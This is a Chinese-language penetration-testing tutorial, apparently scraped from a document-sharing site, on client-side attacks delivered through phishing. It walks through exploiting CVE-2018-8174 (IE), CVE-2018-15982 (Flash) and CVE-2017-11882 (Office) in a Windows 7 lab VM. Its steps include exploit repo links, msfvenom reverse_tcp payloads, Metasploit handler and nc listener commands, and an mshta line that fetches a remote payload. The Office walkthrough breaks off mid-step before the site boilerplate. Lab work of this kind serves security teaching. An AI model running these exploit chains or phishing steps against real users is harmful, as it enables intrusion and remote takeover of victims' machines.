版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領
文檔簡介
客戶端滲透滲透測試基于Web應用系統(tǒng)的滲透雖然較為常見,但是除了常見的Web系統(tǒng)滲透測試外,還可以從客戶端方面進行滲透測試攻擊。前言客戶端滲透簡介IE瀏覽器遠程代碼執(zhí)行(CVE-2018-8174)AdobeFlashPlayer遠程代碼執(zhí)行(CVE-2018-15982)Office遠程代碼執(zhí)行漏洞(CVE-2017-11882)客戶端滲透應用軟件一般有客戶端/服務端(C/S)模式、瀏覽器/服務端(B/S)模式、純客戶端模式。普通用戶在主機系統(tǒng)上運行的軟件大部分時間處于上述模式中客戶端的一方,通過互聯(lián)網(wǎng)主動地訪問遠程服務端,接收并且處理來自于服務端的數(shù)據(jù)??蛻舳藵B透攻擊與上一節(jié)中所述的服務端滲透攻擊有個顯著不同的標志,就是攻擊者向用戶主機發(fā)送的惡意數(shù)據(jù)不會直接導致用戶系統(tǒng)中的服務進程溢出,而是需要結(jié)合一些社會工程學技巧,誘使客戶端用戶去訪問或處理這些惡意數(shù)據(jù),從而間接導致攻擊發(fā)生。客戶端滲透舉例瀏覽器/服務端模式的攻擊,以常用的IE瀏覽器為例,攻擊者發(fā)送一個訪問鏈接給用戶,該鏈接指向服務器上的一個惡意網(wǎng)頁,用戶訪問該網(wǎng)頁時觸發(fā)安全漏洞,執(zhí)行內(nèi)嵌在網(wǎng)頁中的惡意代碼,導致攻擊發(fā)生。
純客戶端模式的攻擊,以Adobe、Office為例,攻擊者通過社會工程學探測到目標用戶的郵箱、即時通信賬戶等個人信息,將惡意文檔發(fā)送給用戶。用戶打開文檔時觸發(fā)安全漏洞,運行其中的惡意代碼,導致攻擊發(fā)生。由此可見,客戶端滲透攻擊與上一節(jié)中所述的服務端滲透攻擊有個顯著不同的標志,就是攻擊者向用戶主機發(fā)送的惡意數(shù)據(jù)不會直接導致用戶系統(tǒng)中的服務進程溢出,而是需要結(jié)合一些社會工程學技巧,誘使客戶端用戶去訪問或處理這些惡意數(shù)據(jù),從而間接導致攻擊發(fā)生??蛻舳藵B透為什么要進行客戶端攻擊?隨著時代發(fā)展到了今天,在有各種WAF、防火墻的情況下,各種漏洞已經(jīng)很難像過去那么好被利用了,攻擊者想繞過防火墻發(fā)動攻擊也不是那么容易的了。而當我們發(fā)送一個釣魚文件到客戶端上,再由客戶端打開這個文件,最后客戶端穿過防火墻回連到我們,此時在客戶端上我們就獲得了一個立足點foothold。這樣的一個過程是相對而言是較為容易的,這也是為什么要進行客戶端攻擊??蛻舳藵B透如何獲得客戶端上的立足點?1、盡可能多的了解目標環(huán)境,即做好信息收集工作2、創(chuàng)建一個虛擬機,使它與目標環(huán)境盡可能的一致,比如操作系統(tǒng)、使用的瀏覽器版本等等都需要保證嚴格一致3、攻擊剛剛創(chuàng)建的虛擬機,這會是最好的攻擊目標4、精心策劃攻擊方法,達到使目標認為這些攻擊行為都是正常行為的效果5、將精心制作的釣魚文件發(fā)送給目標,比如釣魚郵件如果這五步都非常細致精心的去準備,那么攻擊成功的概率會大幅提升??蛻舳藵B透簡介IE瀏覽器遠程代碼執(zhí)行(CVE-2018-8174)AdobeFlashPlayer遠程代碼執(zhí)行(CVE-2018-15982)Office遠程代碼執(zhí)行漏洞(CVE-2017-11882)IE瀏覽器遠程代碼執(zhí)行漏洞(CVE-2018-8174)InternetExplorer,是微軟公司推出的一款網(wǎng)頁瀏覽器,用戶量極大。CVE-2018-8174這個漏洞是WindowsVBScriptEngine代碼執(zhí)行漏洞,由于VBScript腳本執(zhí)行引擎(vbscript.dll)存在代碼執(zhí)行漏洞,攻擊者可以將惡意的VBScript嵌入到office文件或者網(wǎng)站中,一旦用戶不小心打開,遠程攻擊者可以獲取當前用戶權(quán)限執(zhí)行腳本中的惡意代碼。受影響產(chǎn)品:Windows7、WindowsServer2012R2、WindowsRT8.1、WindowsServer2008、WindowsServer2012、Windows8.1、WindowsServer2016、WindowsServer2008R2、Windows10、Windows10Servers。1.下載漏洞利用腳本,下載鏈接:/Yt1g3r/CVE-2018-8174_EXP。IE瀏覽器遠程代碼執(zhí)行漏洞(CVE-2018-8174)2.進入CVE-2018-8174_EXP目錄IE瀏覽器遠程代碼執(zhí)行漏洞(CVE-2018-8174)3.使用python腳本生成payload。命令如下:python2CVE-2018-8174.py-u5/exploit.html-oexp.rtf-i5-p4444IE瀏覽器遠程代碼執(zhí)行漏洞(CVE-2018-8174)4.Kali使用nc開啟本地監(jiān)聽,準備接收反彈shell。IE瀏覽器遠程代碼執(zhí)行漏洞(CVE-2018-8174)5.然后另開一個終端,使用python開啟Web服務,端口80。命令如下:python2-mSimpleHTTPServer80IE瀏覽器遠程代碼執(zhí)行漏洞(CVE-2018-8174)6.Win7虛擬機IE瀏覽器訪問鏈接:5/exploit.html。訪問報錯,但是沒關系,Kali已經(jīng)獲取反彈shell,攻擊成功。IE瀏覽器遠程代碼執(zhí)行漏洞(CVE-2018-8174)7.Kali已經(jīng)獲取反彈shell,攻擊成功IE瀏覽器遠程代碼執(zhí)行漏洞(CVE-2018-8174)客戶端滲透簡介IE瀏覽器遠程代碼執(zhí)行(CVE-2018-8174)AdobeFlashPlayer遠程代碼執(zhí)行(CVE-2018-15982)Office遠程代碼執(zhí)行漏洞(CVE-2017-11882)AdobeFlashPlayer遠程代碼執(zhí)行漏洞(CVE-2018-15982)AdobeFlashPlayer是一種廣泛使用的、專有的多媒體程序播放器,它使用矢量圖形的技術來最小化文件的大小以及創(chuàng)造節(jié)省網(wǎng)絡帶寬和下載時間的文件。因此Flash成為嵌入網(wǎng)頁中的小游戲、動畫以及圖形用戶界面常用的格式。CVE-2018-15982這個漏洞可以進行遠程代碼執(zhí)行,攻擊者通過網(wǎng)頁下載、電子郵件、即時通信等渠道向受害者發(fā)送惡意構(gòu)造的Office文件誘使其打開處理,可能觸發(fā)漏洞在用戶系統(tǒng)上執(zhí)行任意指令獲取控制。受影響產(chǎn)品:AdobeFlashPlayer(53及更早的版本)1.下載漏洞利用腳本,下載鏈接:/Ridter/CVE-2018-15982_EXPAdobeFlashPlayer遠程代碼執(zhí)行漏洞(CVE-2018-15982)2.進入kali用戶的家目錄,然后進入CVE-2018-15982_EXP目錄。AdobeFlashPlayer遠程代碼執(zhí)行漏洞(CVE-2018-15982)3.利用msfvenom生成木馬文件86.bin和64.bin,命令如下:msfvenom-pwindows/meterpreter/reverse_tcpLPORT=4444LHOST=5-fraw>86.binmsfvenom-pwindows/meterpreter/reverse_tcpLPORT=4444LHOST=5-fraw>64.binAdobeFlashPlayer遠程代碼執(zhí)行漏洞(CVE-2018-15982)4.利用下載的腳本生成文件視頻文件exploit.swf和網(wǎng)頁index.html,命令如下:python2CVE_2018_15982.py-i86.bin-I64.binAdobeFlashPlayer遠程代碼執(zhí)行漏洞(CVE-2018-15982)5.msf中設置監(jiān)聽,命令如下:useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetLHOST5setLPORT4444runAdobeFlashPlayer遠程代碼執(zhí)行漏洞(CVE-2018-15982)6.然后另開一個終端,使用python開啟Web服務,端口80,命令如下:python2-mSimpleHTTPServer80AdobeFlashPlayer遠程代碼執(zhí)行漏洞(CVE-2018-15982)7.Win7虛擬機IE瀏覽器訪問5/index.html。有時候ie瀏覽器會崩潰。AdobeFlashPlayer遠程代碼執(zhí)行漏洞(CVE-2018-15982)AdobeFlashPlayer遠程代碼執(zhí)行漏洞(CVE-2018-15982)8.kali中已經(jīng)獲取到shell??蛻舳藵B透簡介IE瀏覽器遠程代碼執(zhí)行(CVE-2018-8174)AdobeFlashPlayer遠程代碼執(zhí)行(CVE-2018-15982)Office遠程代碼執(zhí)行漏洞(CVE-2017-11882)MicrosoftOffice是由Microsoft(微軟)公司開發(fā)的一套基于Windows操作系統(tǒng)的辦公軟件套裝,常用組件有Word、Excel、PowerPoint等。2017年11月14日,微軟發(fā)布了11月份的安全補丁更新,其中比較引人關注的莫過于悄然修復了潛伏17年之久的Office遠程代碼執(zhí)行漏洞(CVE-2017-11882)。該漏洞為Office內(nèi)存破壞漏洞,攻擊者可以利用漏洞以當前登錄的用戶的身份執(zhí)行任意命令。漏洞影響版本:Office365、MicrosoftOffice2000、MicrosoftOffice2003、MicrosoftOffice2007ServicePack3、MicrosoftOffice2010ServicePack2、MicrosoftOffice2013ServicePack1、MicrosoftOffice2016。Office遠程代碼執(zhí)行漏洞(CVE-2017-11882)1.漏洞利用腳本,下載鏈接:/Ridter/CVE-2017-11882Office遠程代碼執(zhí)行漏洞(CVE-2017-11882)2.啟動msfconsole,使用cve_2017_11882腳本進行攻擊,具體命令如下:useexploit/windows/smb/cve_2017_11882setpayloadwindows/meterpreter/reverse_tcpsetlhost5setlport4444seturipathexprunOffice遠程代碼執(zhí)行漏洞(CVE-2017-11882)3.然后生成目標機器的漏洞文檔,進入CVE-2017-11882目錄,執(zhí)行以下命令:python2Command109b_CVE-2017-11882.py-c"mshta5:8080/exp"-oexp.doc上面的這個url是msf中生成的惡意文件exp的下載地址。Office遠程代碼執(zhí)行漏洞(CVE-2017-11882)4.然后另開一個終端,使用python開啟Web服務,端口80。python2-mSimpleHTTPServer80Office遠程代碼執(zhí)行漏洞(CVE-2017-11882)5.Win7虛擬機IE瀏覽器訪問
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
- 6. 下載文件中如有侵權(quán)或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 素描室內(nèi)寫生課程設計
- 相機掛件課程設計
- 英語語言學課程設計
- 航空專業(yè)票務課程設計
- (中職中專)貿(mào)法律與案例教學設計全書電子教案整本書教案1-6章全
- 電信課程設計論文
- 糖化鍋課程設計選型
- 給水廠課程設計總結(jié)心得
- 游戲觀察課程設計
- 聯(lián)考素描課程設計考什么
- 餐飲店購銷合同
- 文化資源數(shù)字化技術有哪些
- 2023年杭州聯(lián)合銀行校園招聘筆試歷年高頻考點試題答案詳解
- 灌裝軋蓋機和供瓶機設備驗證方案
- 《國家中藥飲片炮制規(guī)范》全文
- 《鈷鉧潭西小丘記》教學設計(部級優(yōu)課)語文教案
- 人教版五年級下冊數(shù)學講義
- 安全工器具-變壓器絕緣油課件
- 瓦楞紙箱工藝流程演示文稿
- 神通數(shù)據(jù)庫管理系統(tǒng)v7.0企業(yè)版-3概要設計說明書
- 安置房項目二次結(jié)構(gòu)磚砌體工程專項施工方案培訓資料
評論
0/150
提交評論